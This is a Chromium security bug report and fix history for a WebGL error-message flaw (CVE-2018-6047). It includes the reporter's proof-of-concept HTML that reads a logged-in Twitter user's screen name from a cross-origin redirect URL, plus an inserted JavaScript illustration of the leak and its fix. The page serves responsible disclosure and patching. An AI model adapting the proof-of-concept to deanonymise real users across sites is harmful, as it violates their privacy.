
Issue 799847 link

Starred by 4 users

Issue metadata

Status: Fixed
Owner:
Last visit > 30 days ago
Closed: Jan 2018
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: Linux , Android , Windows , Chrome , Mac
Pri: 1
Type: Bug-Security




Redirect URL leak via error message of WebGL texture

Reported by masatoki...@gmail.com, Jan 8 2018

Issue description

UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.2 Safari/537.36

Steps to reproduce the problem:
Chrome leaks a redirect URL to external origins via the error message of WebGL texture.

1. Log in to your Twitter account.
2. Go to https://vulnerabledoma.in/chrome_webgl_url_leak.html . This page has the following HTML:

<canvas id="canvas"></canvas>
<script>
window.onerror=function(e){
    alert(e);
}
canvas = document.getElementById('canvas');
gl = canvas.getContext("webgl");
texture = gl.createTexture();
img = new Image();
img.onerror = function() { 
    gl.bindTexture(gl.TEXTURE_2D, texture);
    gl.texImage2D(gl.TEXTURE_2D, 0, gl.RGBA, gl.RGBA, gl.UNSIGNED_BYTE, img);
}
img.src = "//analytics.twitter.com/accounts";
</script>

3. You can see your username in the alert dialog:

Uncaught DOMException: Failed to execute 'texImage2D' on 'WebGLRenderingContext': The cross-origin image at https://analytics.twitter.com/i/insights/redirect/home?screen_name=[YOUR_TWITTER_ACCOUNT_HERE] may not be loaded.

What is the expected behavior?
The redirect URL should not be included in the error message.

What went wrong?
The redirect URL is included in the error message.

Did this work before? N/A 

Chrome version: 65.0.3314.2  Channel: stable
OS Version: 10.0
Flash Version:
 
Components: Blink>WebGL Blink>SecurityFeature>SameOriginPolicy
Labels: Security_Impact-Stable OS-Android OS-Chrome OS-Linux OS-Mac
Status: Untriaged (was: Unconfirmed)
Great bug, thanks!
Cc: bajones@google.com
I believe that if we want to expose the full string, we should do so by calling Document::AddConsoleMessage or equivalent directly.


I wonder whether WebGL is the only place this leak exists (e.g. maybe CSP has a similar bug)
RE #2: https://cs.chromium.org/chromium/src/third_party/WebKit/Source/core/workers/WorkerGlobalScope.cpp?l=153&rcl=0aeffba21ac5213b205cfb98b6fc14581b153871 looks potentially suspect as well.

In contrast, we see explicit awareness of this threat in other codepaths, e.g.
https://cs.chromium.org/chromium/src/third_party/WebKit/Source/core/workers/AbstractWorker.cpp?l=58&rcl=0aeffba21ac5213b205cfb98b6fc14581b153871
  // We can safely expose the URL in the following exceptions, as these checks
  // happen synchronously before redirection. JavaScript receives no new
  // information.

Owner: elawrence@chromium.org
Status: Started (was: Untriaged)
Cc: kbr@chromium.org
Labels: Security_Severity-Medium FoundIn-63

Comment 7 by bugdroid1@chromium.org, Jan 10 2018

The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/fae4d7b7d7e5c8a04a8b7a3258c0fc8362afa24c

commit fae4d7b7d7e5c8a04a8b7a3258c0fc8362afa24c
Author: Eric Lawrence <elawrence@chromium.org>
Date: Wed Jan 10 23:00:12 2018

Simplify WebGL error message

The WebGL exception message text contains the full URL of a blocked
cross-origin resource. It should instead contain only a generic notice.

Bug:  799847 
Cq-Include-Trybots: master.tryserver.chromium.android:android_optional_gpu_tests_rel;master.tryserver.chromium.linux:linux_optional_gpu_tests_rel;master.tryserver.chromium.mac:mac_optional_gpu_tests_rel;master.tryserver.chromium.win:win_optional_gpu_tests_rel
Change-Id: I3a7f00462a4643c41882f2ee7e7767e6d631557e
Reviewed-on: https://chromium-review.googlesource.com/854986
Reviewed-by: Brandon Jones <bajones@chromium.org>
Reviewed-by: Kenneth Russell <kbr@chromium.org>
Commit-Queue: Eric Lawrence <elawrence@chromium.org>
Cr-Commit-Position: refs/heads/master@{#528458}
[modify] https://crrev.com/fae4d7b7d7e5c8a04a8b7a3258c0fc8362afa24c/third_party/WebKit/LayoutTests/http/tests/security/webgl-remote-read-remote-image-blocked-no-crossorigin-expected.txt
[modify] https://crrev.com/fae4d7b7d7e5c8a04a8b7a3258c0fc8362afa24c/third_party/WebKit/Source/modules/webgl/WebGLRenderingContextBase.cpp
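As an added illustration (not Chromium's code and not part of the commit above): the shape of the texImage2D error text before and after this change, a check that a message names no URL beyond the one the page itself requested, and a message builder that only ever echoes the requested URL. The domain and account value are constructed placeholders.

```javascript
// Constructed sample: the page requested one URL; the server redirected it to
// another that embeds a per-user value (placeholder, not a real account).
const REQUESTED = "https://analytics.example/accounts";
const FINAL =
  "https://analytics.example/i/insights/redirect/home?screen_name=ACCOUNT_PLACEHOLDER";

// Pre-fix message shape, as quoted in the report: echoes the post-redirect URL,
// which is information the requesting page did not have.
function messageBeforeFix(finalUrl) {
  return `The cross-origin image at ${finalUrl} may not be loaded.`;
}

// Post-fix shape: a generic notice carrying no URL at all.
function messageAfterFix() {
  return "The cross-origin image may not be loaded.";
}

// Every http(s) URL mentioned in a piece of error text.
function urlsIn(text) {
  return text.match(/https?:\/\/[^\s'"]+/g) || [];
}

// A message leaks if it mentions any URL other than the one the page supplied:
// the page already knows that one, so anything else came from the redirect.
function leaksRedirectTarget(message, requestedUrl) {
  return urlsIn(message).some((u) => u !== requestedUrl);
}

// The rule from the AbstractWorker comment cited in #3, applied to this
// message: name the URL only when it is exactly what the page asked for
// (no redirect occurred), otherwise fall back to the generic notice.
function safeErrorMessage(requestedUrl, finalUrl) {
  if (finalUrl === requestedUrl) {
    return `The cross-origin image at ${requestedUrl} may not be loaded.`;
  }
  return messageAfterFix();
}
```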


Comment 8 by sheriffbot@chromium.org, Jan 11 2018

Labels: M-64

Comment 9 by sheriffbot@chromium.org, Jan 11 2018

Labels: -Pri-2 Pri-1
Labels: Merge-Request-64
Status: Fixed (was: Started)

Comment 11 by sheriffbot@chromium.org, Jan 11 2018

Labels: -Merge-Request-64 Hotlist-Merge-Review Merge-Review-64
This bug requires manual review: We are only 11 days from stable.
Please contact the milestone owner if you have questions.
Owners: cmasso@(Android), cmasso@(iOS), kbleicher@(ChromeOS), abdulsyed@(Desktop)

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 12 by cmasso@google.com, Jan 11 2018

Cc: awhalley@chromium.org
awhalley@ please take a look!
First thing Tuesday morning PDT, please check for any crashes/problem reports from Canary. If it looks good then we should merge.

Comment 14 by sheriffbot@chromium.org, Jan 12 2018

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Cc: elawrence@chromium.org
Owner: cma...@chromium.org
cmasso: Do I need to wait for an additional "Merge-Approved", or is #13 sufficient? 
Cc: abdulsyed@chromium.org
abdulsyed@ will need to give the merge approval. (Thanks for checking)
Labels: reward-topanel
Labels: -Merge-Review-64 Merge-Approved-64
Thanks elawrence@ - approving merge for M64. Branch:3282

Comment 19 by bugdroid1@chromium.org, Jan 16 2018

Labels: -merge-approved-64 merge-merged-3282
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/b18672fb63b271a7ebede1e213d83e1e5af129dc

commit b18672fb63b271a7ebede1e213d83e1e5af129dc
Author: Eric Lawrence <elawrence@chromium.org>
Date: Tue Jan 16 20:02:27 2018

Simplify WebGL error message

The WebGL exception message text contains the full URL of a blocked
cross-origin resource. It should instead contain only a generic notice.

Bug:  799847 
Cq-Include-Trybots: master.tryserver.chromium.android:android_optional_gpu_tests_rel;master.tryserver.chromium.linux:linux_optional_gpu_tests_rel;master.tryserver.chromium.mac:mac_optional_gpu_tests_rel;master.tryserver.chromium.win:win_optional_gpu_tests_rel
Change-Id: I3a7f00462a4643c41882f2ee7e7767e6d631557e
Reviewed-on: https://chromium-review.googlesource.com/854986
Reviewed-by: Brandon Jones <bajones@chromium.org>
Reviewed-by: Kenneth Russell <kbr@chromium.org>
Commit-Queue: Eric Lawrence <elawrence@chromium.org>
Cr-Original-Commit-Position: refs/heads/master@{#528458}(cherry picked from commit fae4d7b7d7e5c8a04a8b7a3258c0fc8362afa24c)
Reviewed-on: https://chromium-review.googlesource.com/868831
Reviewed-by: Eric Lawrence <elawrence@chromium.org>
Cr-Commit-Position: refs/branch-heads/3282@{#509}
Cr-Branched-From: 5fdc0fab22ce7efd32532ee989b223fa12f8171e-refs/heads/master@{#520840}
[modify] https://crrev.com/b18672fb63b271a7ebede1e213d83e1e5af129dc/third_party/WebKit/LayoutTests/http/tests/security/webgl-remote-read-remote-image-blocked-no-crossorigin-expected.txt
[modify] https://crrev.com/b18672fb63b271a7ebede1e213d83e1e5af129dc/third_party/WebKit/Source/modules/webgl/WebGLRenderingContextBase.cpp

I've verified the codepath in #3 does not leak the post-redirection URL. 
https://whytls.com/test/webworker.html

Labels: Release-0-M64
Labels: CVE-2018-6047
Labels: -reward-topanel reward-unpaid reward-2000
*** Boilerplate reminders! ***
Please do NOT publicly disclose details until a fix has been released to all our users. Early public disclosure may cancel the provisional reward. Also, please be considerate about disclosure when the bug affects a core library that may be used by other products. Please do NOT share this information with third parties who are not directly involved in fixing the bug. Doing so may cancel the provisional reward. Please be honest if you have already disclosed anything publicly or to third parties. Lastly, we understand that some of you are not interested in money. We offer the option to donate your reward to an eligible charity. If you prefer this option, let us know and we will also match your donation - subject to our discretion. Any rewards that are unclaimed after 12 months will be donated to a charity of our choosing.
*********************************
Nice one! the VRP panel decided to award $2,000 for this one!
Labels: -reward-unpaid reward-inprocess

Comment 26 by sheriffbot@chromium.org, Mar 27 2018

Labels: -M-64 M-65

Comment 27 by sheriffbot@chromium.org, Apr 20 2018

Labels: -Restrict-View-SecurityNotify allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: CVE_description-missing
Labels: -CVE_description-missing CVE_description-submitted
